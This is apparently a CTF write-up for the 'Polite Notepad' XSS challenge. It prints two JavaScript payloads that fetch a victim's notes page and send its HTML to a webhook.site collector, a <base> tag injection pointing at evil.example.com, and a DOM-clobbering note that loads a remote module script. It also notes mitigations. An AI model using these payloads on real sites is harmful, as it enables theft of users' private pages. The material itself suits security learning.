- ctftime: https://ctftime.org/event/1363
I hosted the following file on my server at http://evil.example.com/static/badwords.js:
// Word list as top-level `var` declarations: each `badN` string is paired with
// the `goodN` string that stands in for it (pair 4 maps 'dragon sector' to 'p4').
// NOTE(review): presumably mirrors the notepad's own /static/badwords.js so that the
// page's filter still finds the names it expects; the original file and the filter
// are not shown here. Confirm against the challenge source.
var bad1 = 'fuck'
var good1 = 'f**k'
var bad2 = 'shit'
var good2 = 's**t'
var bad3 = 'damn'
var good3 = 'd**n'
var bad4 = 'dragon sector'
var good4 = 'p4'
/**
 * Fetches the Polite Notepad index page and passes its HTML to an external
 * collector by navigating the current window there, with the HTML URL-encoded
 * in the `q` query parameter.
 *
 * NOTE(review): the response only contains the viewer's notes if this runs in
 * the notepad's own origin with the viewer's session attached. That is inferred
 * from the captured response in the writeup, not from this file. In that case an
 * HttpOnly session cookie does not help, because the script reads the rendered
 * page rather than the cookie.
 */
const main = async () => {
  const response = await fetch("http://politenotepad.zajebistyc.tf/");
  const pageHtml = await response.text();

  // Assigning to `location` is a top-level navigation, not a second fetch.
  const collector = "https://webhook.site/xxxxx-xxxxx-xxxxx/?q=";
  location = collector + encodeURIComponent(pageHtml);
};

main();
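Then I posted the following note. A `<base>` element changes how every relative URL on the page resolves, so a page that presumably loads its word list through a relative URL fetches it from my server instead (a `base-uri` Content-Security-Policy directive, or stripping `<base>` from user HTML, closes this off):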
<base href="http://evil.example.com">
Then, I got:
<html> <head> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous"> <title>Note</title> </head> <body> <nav class="navbar navbar-expand-lg navbar-light bg-light"> <a class="navbar-brand" href="#">Polite Notepad</a> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav mr-auto"> <li class="nav-item"> <a class="nav-link" href="/">My notes</a> </li> <li class="nav-item"> <a class="nav-link" href="/add">Add note</a> </li> <li class="nav-item"> <a class="nav-link" href="/share">Share a link</a> </li> <li class="nav-item"> <a class="nav-link" href="/logout">Logout</a> </li> </ul> </div> </nav> <div class="container"> <ul> <li> <a href="/note/bDMHwXkduXrElcgoTQVwjSBYhNZaHf">flag is here</a> </li> </ul> </div> </body> </html>
The flag was at http://politenotepad.zajebistyc.tf/note/bDMHwXkduXrElcgoTQVwjSBYhNZaHf:
p4{they_said_it_could_be_used_only_once...}
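I hosted the following file on my server at http://evil.example.com/attack.js, served with an `access-control-allow-origin: *` header (the note below loads it with `type=module`, and cross-origin module scripts are fetched in CORS mode):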
/**
 * Fetches the index page of the second notepad instance (politernotepad) and
 * passes its HTML to an external collector by navigating the current window
 * there, with the HTML URL-encoded in the `q` query parameter.
 *
 * NOTE(review): the response only contains the viewer's notes if this runs in
 * the notepad's own origin with the viewer's session attached. That is inferred
 * from the captured response in the writeup, not from this file.
 */
const main = async () => {
  const response = await fetch("http://politernotepad.zajebistyc.tf/");
  const pageHtml = await response.text();

  // Assigning to `location` is a top-level navigation, not a second fetch.
  const collector = "https://webhook.site/xxxxx-xxxxx-xxxxx/?q=";
  location = collector + encodeURIComponent(pageHtml);
};

main();
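Then I posted the following note. The anchor ids reuse the variable names from badwords.js above, so the note's own elements presumably stand in for the filter's word list when the page looks those names up (DOM clobbering); the filter code itself is not shown here. A sanitizer that drops or prefixes `id`/`name` attributes in user HTML, or a filter that does not read its word list from globals, prevents this: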
<a id=bad1 href="a:<script"></a>
<a id=good1 href="a:a"></a>
<a id=bad2 href="ttp:="></a>
<a id=good2 href='ttp://evil.example.com/attack.js" type=module><script></script>'></a>
<a id=bad3 href="a:a"></a>
<a id=good3 href="a:a"></a>
<a id=bad4 href="a:a"></a>
<a id=good4 href="a:a"></a>
a:<script x="
Then, I got:
<html> <head> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous"> <title>Note</title> </head> <body> <nav class="navbar navbar-expand-lg navbar-light bg-light"> <a class="navbar-brand" href="#">Polite Notepad</a> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav mr-auto"> <li class="nav-item"> <a class="nav-link" href="/">My notes</a> </li> <li class="nav-item"> <a class="nav-link" href="/add">Add note</a> </li> <li class="nav-item"> <a class="nav-link" href="/share">Share a link</a> </li> <li class="nav-item"> <a class="nav-link" href="/logout">Logout</a> </li> </ul> </div> </nav> <div class="container"> <ul> <li> <a href="/note/uchoxQeMwTgjeNrtljOPmDfriOkdkR">flag is here</a> </li> </ul> </div> </body> </html>
The flag was at http://politernotepad.zajebistyc.tf/note/uchoxQeMwTgjeNrtljOPmDfriOkdkR:
p4{hope_you_solved_it_the_righ_way_now!}
This chall is a fun puzzle 👍